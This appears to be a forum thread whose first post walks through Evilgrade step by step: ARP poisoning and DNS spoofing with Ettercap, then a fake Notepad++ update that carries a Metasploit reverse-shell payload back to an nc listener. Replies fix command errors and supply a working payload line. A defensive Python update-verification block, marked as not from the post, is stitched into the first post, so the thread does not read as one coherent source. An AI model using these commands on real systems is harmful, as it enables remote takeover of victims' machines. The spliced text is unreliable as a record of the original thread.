
Thread: How To: Evilgrade


  1. #1
    Junior Member
    Join Date
    Jun 2006
    Posts
    63

    How To: Evilgrade

    Today I'll explain how to use Evilgrade. Evilgrade is a modular framework that allows an attacker to take advantage of poorly implemented software upgrades. An attacker can use Evilgrade in combination with DNS spoofing or a MITM attack to spoof a software update and trick the victim computer into executing arbitrary code such as a Metasploit payload. Currently, the Evilgrade framework supports the following software: Java plugin, Winzip, Winamp, MacOS, OpenOffice, iTunes, Linkedin Toolbar, Download Accelerator, notepad++, and speedbit. In this tut, I illustrate how to use Evilgrade with a DNS spoofing attack to execute a reverse shell on a target computer.

    My target will be my Winblows XP machine using Notepad++ on my own network.

    First you will need to download Evilgrade from:
    Code:
    www.infobyte.com.ar
    Once you have downloaded the file you need to decompress it:
    Code:
    BT ~ / tar zxvf lsr-evilgrade-1.0.0.tar.gz
    Ok so navigate to the folder by:
    Code:
    BT ~ / cd lsr-evilgrade
    Now to start Evilgrade you type:
    Code:
    ./evilgrade
    Now that you're in Evilgrade you can have a look at the modules you would like to spoof. You can do that by typing:
    Code:
    show modules
    As you can see there are a few you can spoof, but today I'll be using Notepad++.

    Ok so you have picked your weapon.. err module? We now have to config that module. You can do this by typing:
    Code:
    config notepadplus
    NOTE: If you're not using Notepad++, put the name of the module you would like to configure.

    So now to see all the options for that module you type:
    Code:
    show options
    At this point you can see all the options of that module. You can see the virtual host and the agent to inject.

    Ok so now we have gotten this far. Have I lost you? Good. The next step is choosing what payload to use with the agent.
    You will have to open up a new shell and navigate to the Metasploit directory to see what we can use. You can do that by following the commands below:
    Code:
    BT ~ / cd /pentest/exploits/framework3
    BT ~ / ./msfpayload
    Now find what payload you wish to use and remember where it is located.
    I will be using windows/shell_reverse_tcp
    So now we go back to the Evilgrade shell and set the agent. To set the agent follow the commands below:
    Code:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LHOST=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    NOTE: LHOST is your IP and LPORT is the port you want it to connect to.
    What that does is when the victim uses the update it will connect back to you.

    So now the payload and update are all set. The next thing we want to do is DNS spoofing. In order to complete this you need some background knowledge of DNS spoofing.
    So now we have to edit the etter.dns file. You can do that by following these commands:
    Code:
    BT ~ / cd /usr/local/share/ettercap
    BT ~ / nano etter.dns
    Delete all the junk in the file that won't be used. It should look like this after you are done.
    NOTE: Remember I'm using the Notepad++ module; this will be different if you're using another module.
    Code:
      GNU nano 2.0.6                         File: etter.dns                                                Modified
    
    #                                                                          #
    # or for WINS query:                                                       #
    #    workgroup WINS 127.0.0.1                                              #
    #    PC*       WINS 127.0.0.1                                              #
    #                                                                          #
    # NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
    #       so if you want to reverse poison you have to specify a plain       #
    #       host. (look at the www.microsoft.com example)                      #
    #                                                                          #
    ############################################################################
    
    ################################
     notepadplus.sourceforge.net A yourIP
    Now we're going to want to start Ettercap. While still in the shell you edited the etter.dns in, type the following:
    Code:
    ettercap -G
    Now that we're in Ettercap we need to:
    Sniff (eth0)
    Scan for hosts
    Set the targets: Default gateway + target pc
    Use a MITM attack, ARP poisoning
    Go to Plugins and use dns_spoof
    Start sniffing

    So now open another shell so we can listen on the port that the module will open once the victim has downloaded the "update".
    To listen on the port type the following:
    Code:
    nc -l -v -p port
    NOTE: The port number has to be the port number you set up with the module.

    Now go back to Evilgrade and type the following:
    Code:
    start
    Now you have to wait for the victim to accept the update when they open up the program that your module is for. Once they update the program, you will see in the shell where you typed the listen command for that port that you are now in their CMD.

    I hope this has been a help in any way; if you have any suggestions for what I should add or change, please don't hesitate to send me a PM about it.

    Thanks, Jesse.
    Jesse -- NOM NOM NOM ^.^
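    Evilgrade only works because the updater runs whatever the host it resolved happens to serve. As an added example (not from this post or the Evilgrade project), the client-side check below is what closes that hole: a pinned HTTPS host plus a SHA-256 digest from a manifest the client already trusts, so a DNS-spoofed host handing out a substituted binary is rejected before anything executes. The vendor host name, manifest layout and byte strings are constructed assumptions.

```python
"""Update-client verification that defeats a spoofed update server.
All hosts, manifests and payload bytes below are constructed for the example."""
import hashlib
import hmac
import json
from urllib.parse import urlparse

# Hosts pinned in the shipped client (constructed, hypothetical vendor host).
TRUSTED_UPDATE_HOSTS = {"updates.example-vendor.invalid"}


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_update_url(url: str) -> bool:
    """Reject plain HTTP and any host that is not pinned. A spoofed DNS answer
    for a pinned host still has to pass the digest check in verify_update."""
    u = urlparse(url)
    return u.scheme == "https" and u.hostname in TRUSTED_UPDATE_HOSTS


def verify_update(manifest_json: str, downloaded: bytes) -> tuple:
    """manifest_json is the vendor manifest obtained over an authenticated
    channel (embedded here). Returns (ok, reason); only run when ok is True."""
    m = json.loads(manifest_json)
    if not check_update_url(m["url"]):
        return False, "update URL not https or host not pinned"
    if len(downloaded) != m["size"]:
        return False, "size mismatch"
    # Constant-time compare so the check leaks nothing about partial matches.
    if not hmac.compare_digest(digest(downloaded), m["sha256"]):
        return False, "sha256 mismatch: refusing to execute"
    return True, "verified"


# Constructed sample data: the genuine installer and two substituted files.
GENUINE_UPDATE = b"genuine installer bytes (constructed)"
SPOOFED_UPDATE = b"attacker-substituted bytes (constructed)"
SAME_SIZE_SPOOF = b"X" * len(GENUINE_UPDATE)
MANIFEST = json.dumps({
    "url": "https://updates.example-vendor.invalid/npp-update.exe",
    "size": len(GENUINE_UPDATE),
    "sha256": digest(GENUINE_UPDATE),
})

if __name__ == "__main__":
    print(verify_update(MANIFEST, GENUINE_UPDATE))   # (True, 'verified')
    print(verify_update(MANIFEST, SPOOFED_UPDATE))   # (False, 'size mismatch')
    print(verify_update(MANIFEST, SAME_SIZE_SPOOF))  # (False, 'sha256 mismatch: ...')
```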

  2. #2
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318
    Don't eat yellow snow :rolleyes:

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213


    http://vimeo.com/1575771
    this video is really good

  4. #4
    Junior Member ktzqbp's Avatar
    Join Date
    Nov 2008
    Posts
    25


    Thanks for this, antichrist. I'll give it a shot sometime this weekend.

  5. #5


    Good guide! Well done!

    Just one little problem with it:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LHOST=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    There are two LHOSTs; the last one needs to be LPORT (to match up with port).
    example:
    Code:
    set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    Else it works well!
    Now a new toy for me to play with (=
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Nice tutorial, antichrist. Couple of things in addition to g0tmi1k -

    tar zxvf lsr-evilgrade-1.0.0.tar.gz
    cd lsr-evilgrade
    The "l" is actually "i"-
    tar zxvf isr-evilgrade-1.0.0.tar.gz
    cd isr-evilgrade

    AND, 2nd point is - although it works fine with BT3, it's not with BT4. Has anybody tried evilgrade with BT4?
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #7
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63


    Thank you so much adkfjsklfjj you saved me some time..
    One day your life will flash before your eyes. Make sure its worth watching.

  8. #8
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    3

    thanks

    I second the thanks for the PERL tip in BT4.

  9. #9
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280


    I saw the presentation from last year by Francisco Amato
    demonstrating the framework at H2HC.
    Really fantastic.

    I would like to ask if somebody knows whether a module for Windows Update exists.

    Thanks
    "If you aim the gun at your foot and pull the trigger, it's
    UNIX's job to ensure reliable delivery of the bullet to
    where you aimed the gun (in this case, Mr. Foot)."

  10. #10
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213


    I have played with evilgrade a long time ago, I have a few questions... I'm going to look through the source and hopefully I'll answer them myself...

    could this be done in the style of autopwn? how hard would it be to add more modules...
